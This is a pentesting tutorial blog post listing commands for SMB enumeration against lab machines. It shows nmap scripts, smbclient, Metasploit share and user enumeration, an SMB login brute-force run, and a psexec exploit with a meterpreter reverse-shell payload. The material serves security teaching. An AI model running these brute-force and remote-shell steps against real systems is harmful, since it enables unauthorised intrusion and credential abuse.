control – smb 445, 137, 139

For the near future I will only be releasing new blogs on this site https://1337red.wordpress.com/

myexploit will continue but please vist 1337red for SE, Redteaming and advanced pentesting techniques.

SE remote to internal Pentesting how-to capture the domain admin https://myexploit.wordpress.com/remote-social-engineering-the-da-trilogy/

root@bt:~# nmap --script smb-enum-shares.nse -p445 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1478-02-12 09:11 BST
Nmap scan report for IP-Address
Host is up (0.00092s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 01:02:03:04:05:06 (Micky Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|     Current user (‘guest’) access: <none>
|   C$
|     Anonymous access: <none>
|     Current user (‘guest’) access: <none>
|   IPC$
|     Anonymous access: READ <not a file share>
|     Current user (‘guest’) access: READ <not a file share>
|   Printer
|     Anonymous access: <none>
|     Current user (‘guest’) access: READ
|   SharedDocs
|     Anonymous access: <none>
|     Current user (‘guest’) access: READ/WRITE
|   Test
|     Anonymous access: <none>
|     Current user (‘guest’) access: READ
|   print$
|     Anonymous access: <none>
|_    Current user (‘guest’) access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds

——————————————————

root@bt:~# nmap -sU -sS –script smb-enum-shares.nse -p U:137,T:139 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1478-02-12 09:11 BST
Nmap scan report for IP-Address
Host is up (0.00043s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
137/udp open  netbios-ns
MAC Address: 01:02:03:04:05:06 (Micky Systems)

Host script results:
| smb-enum-shares:
|   ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds

——————————————————

Manuly testing Anonymous smb access from backtrack 5r1

root@bt:~# /usr/bin/smbclient -L IP-Address
Enter root’s password: (Add pass if you know or just Press enter)
Domain=[TEST] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename       Type      Comment
———       —-      ——-
IPC$            IPC       Remote IPC
print$          Disk      Printer Drivers
SharedDocs      Disk
Test            Disk
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
Printer         Printer   Microsoft XPS Document Writer
session request to IP-Address failed (Called name not present)
session request to 10 failed (Called name not present)
Domain=[TEST] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server               Comment
———            ——-

Workgroup            Master
———            ——-

——————————————————

msf > use scanner/smb/smb_login
msf  auxiliary(smb_login) > set rhosts IP-Address
msf  auxiliary(smb_login) > set SMBUser admin
msf  auxiliary(smb_login) > set SMBPass password
msf  auxiliary(smb_login) > run

[*] IP-Address:445 SMB – Starting SMB login bruteforce
[-]IP-Address – This system allows guest sessions with any credentials, these instances will not be reported.
[*]IP-Address – GUEST LOGIN (Windows 5.1) admin :
[*]IP-Address – GUEST LOGIN (Windows 5.1) admin : admin
[*]IP-Address- GUEST LOGIN (Windows 5.1) admin : password
[*]IP-Address – GUEST LOGIN (Windows 5.1) administrator :
[*]IP-Address – GUEST LOGIN (Windows 5.1) administrator : administrator
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

NOTE

Seeing GUEST LOGIN (Windows 5.1) admin : password = none domain as GUEST is used
If you see – SUCCESSFUL LOGIN (Windows 5.1) ‘username’ : ‘password’ (with a username and a password) = domain and you can go on to try and exploit.

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost remote-IP-Address

msf exploit(psexec) > set smbuser username

msf exploit(psexec) > set smbpass password

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

msf exploit(psexec) > set lhost local-IP-Address

msf exploit(psexec) > exploit

——————————————————

smb_enumusers metasploit

The smb_enumusers scanner will connect to each system via the SMB RPC service and enumerate the users on the systemmsf > use auxiliary/scanner/smb/smb_enumusers

msf > use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts IP-Address
msf auxiliary(smb_enumusers) > run

[*] IP-Address METASPLOITABLE [ games, nobody, bind, proxy, syslog, user, www-data, root, news, postgres, bin, mail, distccd, proftpd, dhcp, daemon, sshd, man, lp, mysql, gnats, libuuid, backup, msfadmin, telnetd, sys, klog, postfix, service, list, irc, ftp, tomcat55, sync, uucp ] ( LockoutTries=0 PasswordMin=5 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

———————————————–

smb_enumusers nmap

root@bt:~# nmap –script smb-enum-users.nse -p 445 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 11:13 BST
Nmap scan report for IP-Address
Host is up (0.00051s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:EB:18:CC (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
| METASPLOITABLE\backup (RID: 1068)
| Full name: backup
| Flags: Account disabled, Normal user account
| METASPLOITABLE\bin (RID: 1004)
| Full name: bin
| Flags: Account disabled, Normal user account
| METASPLOITABLE\bind (RID: 1210)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\daemon (RID: 1002)
| Full name: daemon
| Flags: Account disabled, Normal user account
| METASPLOITABLE\dhcp (RID: 1202)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\distccd (RID: 1222)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\ftp (RID: 1214)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\games (RID: 1010)
| Full name: games
| Flags: Account disabled, Normal user account
| METASPLOITABLE\gnats (RID: 1082)
| Full name: Gnats Bug-Reporting System (admin)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\irc (RID: 1078)
| Full name: ircd
| Flags: Account disabled, Normal user account
| METASPLOITABLE\klog (RID: 1206)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\libuuid (RID: 1200)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\list (RID: 1076)
| Full name: Mailing List Manager
| Flags: Account disabled, Normal user account
| METASPLOITABLE\lp (RID: 1014)
| Full name: lp
| Flags: Account disabled, Normal user account
| METASPLOITABLE\mail (RID: 1016)
| Full name: mail
| Flags: Account disabled, Normal user account
| METASPLOITABLE\man (RID: 1012)
| Full name: man
| Flags: Account disabled, Normal user account
| METASPLOITABLE\msfadmin (RID: 3000)
| Full name: msfadmin,,,
| Flags: Normal user account
| METASPLOITABLE\mysql (RID: 1218)
| Full name: MySQL Server,,,
| Flags: Account disabled, Normal user account
| METASPLOITABLE\news (RID: 1018)
| Full name: news
| Flags: Account disabled, Normal user account
| METASPLOITABLE\nobody (RID: 501)
| Full name: nobody
| Flags: Account disabled, Normal user account
| METASPLOITABLE\postfix (RID: 1212)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\postgres (RID: 1216)
| Full name: PostgreSQL administrator,,,
| Flags: Account disabled, Normal user account
| METASPLOITABLE\proftpd (RID: 1226)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\proxy (RID: 1026)
| Full name: proxy
| Flags: Account disabled, Normal user account
| METASPLOITABLE\root (RID: 1000)
| Full name: root
| Flags: Account disabled, Normal user account
| METASPLOITABLE\service (RID: 3004)
| Full name: ,,,
| Flags: Account disabled, Normal user account
| METASPLOITABLE\sshd (RID: 1208)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\sync (RID: 1008)
| Full name: sync
| Flags: Account disabled, Normal user account
| METASPLOITABLE\sys (RID: 1006)
| Full name: sys
| Flags: Account disabled, Normal user account
| METASPLOITABLE\syslog (RID: 1204)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\telnetd (RID: 1224)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\tomcat55 (RID: 1220)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\user (RID: 3002)
| Full name: just a user,111,,
| Flags: Normal user account
| METASPLOITABLE\uucp (RID: 1020)
| Full name: uucp
| Flags: Account disabled, Normal user account
| METASPLOITABLE\www-data (RID: 1066)
| Full name: www-data
|_ Flags: Account disabled, Normal user account

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

———————————————–

msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(smb_enumshares) > set rhosts IP-Address
msf auxiliary(smb_enumshares) > run

[*] IP-Address:139 print$ – Printer Drivers (DISK), tmp – oh noes! (DISK), opt – (DISK), IPC$ – IPC Service (metasploitable server (Samba 3.0.20-Debian)) (IPC), ADMIN$ – IPC Service (metasploitable server (Samba 3.0.20-Debian)) (IPC)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

———————————————–

root@bt:~# nmap –script smb-enum-shares.nse -p445 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 11:16 BST
Nmap scan report for IP-Address
Host is up (0.00038s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:EB:18:CC (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

———————————————–

msf > use auxiliary/scanner/smb/smb2
msf auxiliary(smb2) > set rhosts IP-Address
msf auxiliary(smb2) > set THREADS 16
msf auxiliary(smb2) > run

———————————————–

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set rhosts IP-Address
rhosts => IP-Address
msf auxiliary(smb_version) > run

[*] IP-Address:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s